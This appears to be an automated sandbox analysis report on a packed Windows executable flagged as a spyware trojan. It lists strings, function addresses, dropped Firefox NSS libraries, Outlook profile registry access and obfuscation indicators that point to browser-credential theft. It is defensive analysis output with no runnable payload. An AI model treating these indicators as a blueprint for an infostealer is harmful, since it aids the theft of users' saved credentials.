Source: file.exe, 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: BFHIJEBKEBGHIDHJKJEGCBAEGH.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.1701427357.000000002F60E000.00000004.00000020.00020000.00000000.sdmp, BFHIJEBKEBGHIDHJKJEGCBAEGH.0.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.1701427357.000000002F60E000.00000004.00000020.00020000.00000000.sdmp, BFHIJEBKEBGHIDHJKJEGCBAEGH.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCFB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6CCFB700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCFB8C0 rand_s,NtQueryVirtualMemory,	0_2_6CCFB8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCFB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6CCFB910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC9F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6CC9F280

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006498C4	0_2_006498C4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007748C9	0_2_007748C9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EC892	0_2_006EC892
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007799D5	0_2_007799D5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0077EA4C	0_2_0077EA4C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00640AD0	0_2_00640AD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00776413	0_2_00776413
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006C6CEE	0_2_006C6CEE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00780564	0_2_00780564
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00716E78	0_2_00716E78
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00777EF5	0_2_00777EF5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0077CFCC	0_2_0077CFCC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC935A0	0_2_6CC935A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCA64C0	0_2_6CCA64C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCBD4D0	0_2_6CCBD4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC9D4E0	0_2_6CC9D4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCD6CF0	0_2_6CCD6CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCA6C80	0_2_6CCA6C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCF34A0	0_2_6CCF34A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCFC4A0	0_2_6CCFC4A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCA5440	0_2_6CCA5440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CD0545C	0_2_6CD0545C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CD0AC00	0_2_6CD0AC00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCD5C10	0_2_6CCD5C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCE2C10	0_2_6CCE2C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CD0542B	0_2_6CD0542B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCD0DD0	0_2_6CCD0DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCF85F0	0_2_6CCF85F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCAFD00	0_2_6CCAFD00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCBED10	0_2_6CCBED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCC0512	0_2_6CCC0512
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CD076E3	0_2_6CD076E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC9BEF0	0_2_6CC9BEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCAFEF0	0_2_6CCAFEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCFE680	0_2_6CCFE680
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCB5E90	0_2_6CCB5E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCF4EA0	0_2_6CCF4EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCE2E4E	0_2_6CCE2E4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCB4640	0_2_6CCB4640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCB9E50	0_2_6CCB9E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCD3E50	0_2_6CCD3E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CD06E63	0_2_6CD06E63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC9C670	0_2_6CC9C670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCE5600	0_2_6CCE5600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCD7E10	0_2_6CCD7E10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCF9E30	0_2_6CCF9E30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC9DFE0	0_2_6CC9DFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCC6FF0	0_2_6CCC6FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCE77A0	0_2_6CCE77A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCA9F00	0_2_6CCA9F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCD7710	0_2_6CCD7710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CD050C7	0_2_6CD050C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCBC0E0	0_2_6CCBC0E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCD58E0	0_2_6CCD58E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCC60A0	0_2_6CCC60A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCB8850	0_2_6CCB8850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCBD850	0_2_6CCBD850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCDF070	0_2_6CCDF070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCA7810	0_2_6CCA7810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCDB820	0_2_6CCDB820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCE4820	0_2_6CCE4820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCD5190	0_2_6CCD5190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCF2990	0_2_6CCF2990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC9C9A0	0_2_6CC9C9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCCD9B0	0_2_6CCCD9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCBA940	0_2_6CCBA940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CD0B170	0_2_6CD0B170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCAD960	0_2_6CCAD960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCEB970	0_2_6CCEB970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCD8AC0	0_2_6CCD8AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCB1AF0	0_2_6CCB1AF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCDE2F0	0_2_6CCDE2F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CD0BA90	0_2_6CD0BA90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CD02AB0	0_2_6CD02AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC922A0	0_2_6CC922A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCC4AA0	0_2_6CCC4AA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCACAB0	0_2_6CCACAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCD9A60	0_2_6CCD9A60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CD053C8	0_2_6CD053C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC9F380	0_2_6CC9F380
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC95340	0_2_6CC95340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCAC370	0_2_6CCAC370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCDD320	0_2_6CCDD320

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CCD94D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 003A45C0 appears 316 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CCCCBE8 appears 134 times

Source: file.exe, 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.1778301679.000000006CF15000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: kcvavvdu ZLIB complexity 0.9947841099330357

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/23@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CCF7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6CCF7030

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003B9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_003B9600

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003B3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_003B3720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\W5V0E1NF.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.1778182590.000000006CECF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1777681322.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1766517240.000000001D4B8000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.1778182590.000000006CECF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1777681322.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1766517240.000000001D4B8000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.1778182590.000000006CECF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1777681322.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1766517240.000000001D4B8000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.1778182590.000000006CECF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1777681322.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1766517240.000000001D4B8000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.1778182590.000000006CECF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1777681322.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1766517240.000000001D4B8000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.1778182590.000000006CECF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1777681322.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1766517240.000000001D4B8000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000002.1777681322.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1766517240.000000001D4B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.1622477131.000000001D3B4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1637314516.000000001D3A7000.00000004.00000020.00020000.00000000.sdmp, AEGHJEGIEBFIJJKFIIIJ.0.dr, DBFBFBGDBKJJKFIEHJDB.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.1777681322.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1766517240.000000001D4B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.1777681322.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1766517240.000000001D4B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

ReversingLabs: Detection: 44%

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1876480 > 1048576

Source: file.exe

Static PE information: Raw size of kcvavvdu is bigger than: 0x100000 < 0x1a4000

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.1778182590.000000006CECF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.1778182590.000000006CECF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.3a0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;kcvavvdu:EW;yzcfswdr:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;kcvavvdu:EW;yzcfswdr:EW;.taggant:EW;

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003B9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_003B9860

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x1d0bdb should be: 0x1d7154

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: kcvavvdu
Source: file.exe	Static PE information: section name: yzcfswdr
Source: file.exe	Static PE information: section name: .taggant
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00841889 push ecx; mov dword ptr [esp], eax	0_2_008418B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003BB035 push ecx; ret	0_2_003BB048
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00870892 push 328684ABh; mov dword ptr [esp], ebx	0_2_00870E49
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008228A6 push eax; mov dword ptr [esp], ebx	0_2_008228DF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008300A6 push ebx; mov dword ptr [esp], esi	0_2_008300E7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008300A6 push 1513F2F6h; mov dword ptr [esp], ecx	0_2_008300EF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007FF84B push ecx; mov dword ptr [esp], esi	0_2_007FF855
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008898B7 push ebp; mov dword ptr [esp], edi	0_2_008898DF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008898B7 push ebp; mov dword ptr [esp], 6470CE53h	0_2_00889920
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008898B7 push 63A9FC12h; mov dword ptr [esp], edx	0_2_0088999F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007EC031 push esi; mov dword ptr [esp], edi	0_2_007EC08C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006198EF push edx; mov dword ptr [esp], ebp	0_2_006198FC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006198EF push edi; mov dword ptr [esp], edx	0_2_00619934
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006198EF push edx; mov dword ptr [esp], ebp	0_2_00619946
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0080D817 push edi; mov dword ptr [esp], 32F902A4h	0_2_0080D841
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0080D817 push 6CDA68F7h; mov dword ptr [esp], eax	0_2_0080D886
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00889815 push 40549017h; mov dword ptr [esp], edi	0_2_00889853
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006498C4 push ebp; mov dword ptr [esp], 39F976F2h	0_2_0064992C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006498C4 push edx; mov dword ptr [esp], 5FFF184Eh	0_2_006499B1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006498C4 push 43469F1Bh; mov dword ptr [esp], ebx	0_2_00649A36
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0086E034 push esi; mov dword ptr [esp], ecx	0_2_0086E03E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007748C9 push eax; mov dword ptr [esp], esi	0_2_007748D9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007748C9 push edx; mov dword ptr [esp], ebp	0_2_007748EF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007748C9 push 50CF5399h; mov dword ptr [esp], edx	0_2_00774956
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007748C9 push 40619F20h; mov dword ptr [esp], edi	0_2_0077496B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007748C9 push eax; mov dword ptr [esp], 7D0ED900h	0_2_00774982
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007748C9 push 22EA0A72h; mov dword ptr [esp], esi	0_2_007749C4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007748C9 push 2115901Bh; mov dword ptr [esp], edi	0_2_00774A47
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007748C9 push 4EC0B478h; mov dword ptr [esp], edx	0_2_00774AA8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007748C9 push 7409DE36h; mov dword ptr [esp], esi	0_2_00774AC8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007748C9 push edi; mov dword ptr [esp], esi	0_2_00774ADF

Source: file.exe

Static PE information: section name: kcvavvdu entropy: 7.953400500755208

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
